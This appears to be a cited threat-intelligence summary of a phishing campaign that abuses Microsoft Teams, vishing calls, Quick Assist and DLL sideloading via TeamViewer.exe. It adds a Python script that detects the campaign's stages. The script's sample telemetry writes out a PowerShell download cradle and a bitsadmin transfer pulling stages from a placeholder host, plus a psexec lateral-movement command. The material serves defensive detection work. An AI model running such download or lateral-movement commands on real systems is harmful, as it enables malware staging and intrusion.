Introduction
A sophisticated multi-stage phishing attack has been identified [1] [5], utilizing advanced techniques such as vishing, remote access tools [1] [2] [3] [5] [6] [7], and DLL sideloading [1] [3] [5]. This threat exploits platforms like Microsoft Teams and Quick Assist, beginning with a phishing message that includes a malicious PowerShell payload [7], ultimately deploying a JavaScript-based command-and-control (C2) backdoor on victim devices [1] [5].
Description
A sophisticated multi-stage phishing attack has been identified [1] [5], leveraging vishing [4], remote access tools [1] [2] [3] [5] [6] [7], and DLL sideloading techniques [1] [5]. This evolving threat exploits Microsoft Teams and Quick Assist [1] [5], beginning with a phishing message that includes a malicious PowerShell payload [7], ultimately deploying a JavaScript-based command-and-control (C2) backdoor on victim devices [1] [5].
The attack commences with a vishing scheme initiated through a Microsoft Teams message from a seemingly legitimate external user; the message contains a PowerShell command designed to download a payload that facilitates further attacks. This is followed by a vishing call that builds trust and persuades the target to execute the script, triggering the larger attack chain [3]. Attackers utilize living-off-the-land binaries, sideloading a malicious DLL named TV.dll into a trusted process by executing the signed binary TeamViewer.exe [3] [4] [5] [6], which is strategically placed in a hidden folder to blend in with normal system activity. They establish persistence by creating a shortcut in the Startup folder [1] [5], ensuring the malware runs automatically after a system reboot [3], and use the Windows Background Intelligent Transfer Service (BITS) to discreetly transfer files and stage additional malware [6], maintaining access for up to 90 days [3].
Threat researchers have noted significant similarities between this attack and previous campaigns attributed to Storm-1811 [5], a group known for employing vishing and Quick Assist to infiltrate networks [1] [5]. The tactics used [1] [3] [5] [6], such as abusing signed binaries [1] [5], DLL sideloading [1] [3] [5], and leveraging Microsoft Teams as an entry point [3], align with the known methodologies of Storm-1811 [5]. Additionally, advanced evasion techniques [6], including process hollowing and API hooking [6], were employed to avoid detection, alongside checks for virtual machines and debugging tools [6]. The attacker also conducted system scans using Windows Management Instrumentation (WMI) to gather information about the machine and its security software [6], used psexec.exe for lateral movement, and stole saved login credentials from web browsers [6].
Mitigation strategies emphasize the need for real-time scanning across all communication channels [2], as these attacks typically begin with social engineering before deploying malicious tools such as sideloaded DLLs [1] [2]. Defenders are advised to monitor for unexpected use of Quick Assist, unusual execution paths for signed binaries like TeamViewer.exe [3], and other signs of DLL sideloading [3]. This incident underscores the significant risks posed by social engineering and the misuse of trusted tools [3], with a reported 1633% increase in vishing attacks noted in Q1 2025. The increasing sophistication of phishing and vishing attacks [6], particularly the use of AI-powered voice cloning in vishing schemes [1], highlights the need for organizations to adopt machine learning-powered tools that incorporate computer vision [6], natural language processing [2], and behavioral analysis to better recognize the suspicious activity indicative of such threats.
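The monitoring advice above (signed binaries running from unusual paths, DLL sideloading, Startup-folder persistence, BITS staging, PowerShell download commands and psexec.exe use) can be turned into concrete detection logic over endpoint telemetry. The following script is an added example, not code from any of the cited sources or their authors: it evaluates Sysmon-style events (EventID 1 process creation, 7 image load, 11 file creation) against rules derived from the chain described in this article and correlates the stages seen. The event records, paths, hostnames and URLs are constructed for illustration; the "trusted install directories" for TeamViewer and the benign TV.dll baseline event are assumptions, not facts taken from the article.

```python
"""Detection sketch (added example, not the article's or any vendor's code).

Flags telemetry consistent with the Teams -> PowerShell -> TeamViewer.exe/TV.dll
chain described above. Event shape mimics Sysmon field names; every sample
value below is constructed for illustration.
"""
import ntpath
import re
from typing import Dict, List, Set, Tuple

Event = Dict[str, object]
Finding = Tuple[int, str]  # (index of the event, rule name)

# Assumption: where a legitimate TeamViewer installation is expected to live.
TRUSTED_INSTALL_DIRS = (
    r"c:\program files\teamviewer",
    r"c:\program files (x86)\teamviewer",
)
# A .lnk dropped into a per-user or all-users Startup folder.
STARTUP_LNK_RE = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.lnk$", re.I)
# Common download primitives in a PowerShell command line.
DOWNLOAD_CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)


def _norm(path: str) -> str:
    """Normalise a Windows path for comparison (backslashes, lower case)."""
    return path.replace("/", "\\").lower()


def is_trusted_dir(path: str) -> bool:
    """True if the file sits in (or under) an expected TeamViewer install directory."""
    d = ntpath.dirname(_norm(path))
    return any(d == t or d.startswith(t + "\\") for t in TRUSTED_INSTALL_DIRS)


def detect(events: List[Event]) -> List[Finding]:
    """Apply the chain rules in order; returns one finding per matching event."""
    findings: List[Finding] = []
    odd_tv_dirs: Set[str] = set()  # directories TeamViewer.exe ran from unexpectedly
    for i, ev in enumerate(events):
        eid = ev.get("EventID")
        image = _norm(str(ev.get("Image", "")))
        name = ntpath.basename(image)
        if eid == 1:  # process creation
            cmd = str(ev.get("CommandLine", ""))
            if name == "teamviewer.exe" and not is_trusted_dir(image):
                odd_tv_dirs.add(ntpath.dirname(image))
                findings.append((i, "signed_binary_unusual_path"))
            elif name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE_RE.search(cmd):
                findings.append((i, "powershell_download_cradle"))
            elif name == "bitsadmin.exe" and "/transfer" in cmd.lower():
                findings.append((i, "bits_transfer"))
            elif name in ("psexec.exe", "psexec64.exe"):
                findings.append((i, "psexec_execution"))
        elif eid == 7:  # image (DLL) load
            loaded = _norm(str(ev.get("ImageLoaded", "")))
            # TV.dll loaded from a user-writable or otherwise untrusted directory,
            # especially one a misplaced TeamViewer.exe already ran from.
            if ntpath.basename(loaded) == "tv.dll" and (
                ntpath.dirname(loaded) in odd_tv_dirs or not is_trusted_dir(loaded)
            ):
                findings.append((i, "dll_sideloading_tv_dll"))
        elif eid == 11:  # file creation
            if STARTUP_LNK_RE.search(str(ev.get("TargetFilename", ""))):
                findings.append((i, "startup_folder_persistence"))
    return findings


def chain_score(findings: List[Finding]) -> int:
    """Number of distinct chain stages observed; several on one host warrants escalation."""
    return len({rule for _, rule in findings})


# Constructed sample telemetry (not real IoCs): a benign TeamViewer baseline plus
# one host showing the full chain.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')"},
    {"EventID": 1, "Image": r"C:\Program Files\TeamViewer\TeamViewer.exe", "CommandLine": "TeamViewer.exe"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Roaming\.cache\TeamViewer.exe", "CommandLine": "TeamViewer.exe"},
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\.cache\TeamViewer.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Roaming\.cache\TV.dll"},
    # Assumed benign baseline: the same DLL name loaded from the install directory.
    {"EventID": 7, "Image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "ImageLoaded": r"C:\Program Files\TeamViewer\TV.dll"},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Roaming\.cache\TeamViewer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer.lnk"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job http://example.invalid/stage2 C:\Users\alice\AppData\Roaming\.cache\stage2.bin"},
    {"EventID": 1, "Image": r"C:\Tools\psexec.exe", "CommandLine": r"psexec.exe \\fileserver01 cmd.exe"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for idx, rule in hits:
        print(f"event {idx}: {rule}")
    print("distinct stages:", chain_score(hits))
```

Each rule on its own is noisy (a PowerShell download or a bitsadmin transfer can be legitimate), which is why `chain_score` matters: a single host showing a misplaced signed binary, a DLL loaded beside it, a Startup shortcut and a BITS transfer within a short window is the pattern the article describes, and that combination, not any one alert, is what should page an analyst. In production the same rules would be expressed in the SIEM's query language and keyed by host and time window.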
Conclusion
The identified phishing attack highlights the growing complexity and sophistication of cyber threats, particularly those leveraging social engineering and trusted platforms. Organizations must prioritize real-time monitoring and adopt advanced machine learning tools to detect and mitigate such threats effectively. The significant rise in vishing attacks and the use of AI in these schemes underscore the urgent need for enhanced security measures to protect against evolving cyber threats.
References
[1] https://ciso2ciso.com/new-phishing-attack-combines-vishing-and-dll-sideloading-techniques-source-www-infosecurity-magazine-com/
[2] https://www.forbes.com/sites/daveywinder/2025/04/01/microsoft-teams-users-exploited-in-sophisticated-multi-stage-ai-attack/
[3] https://hackread.com/microsoft-teams-vishing-deploy-malware-via-teamviewer/
[4] https://blog.hunterstrategy.net/trending-topics-22/
[5] https://www.infosecurity-magazine.com/news/phishing-attack-combines-vishing/
[6] https://redmondmag.com/Articles/2025/04/01/Security-Firm-Reveals-Voice-Phishing-Attack-Targeting-Microsoft-Teams.aspx
[7] https://bestofai.com/article/microsoft-teams-users-exploited-in-sophisticated-multi-stage-ai-attack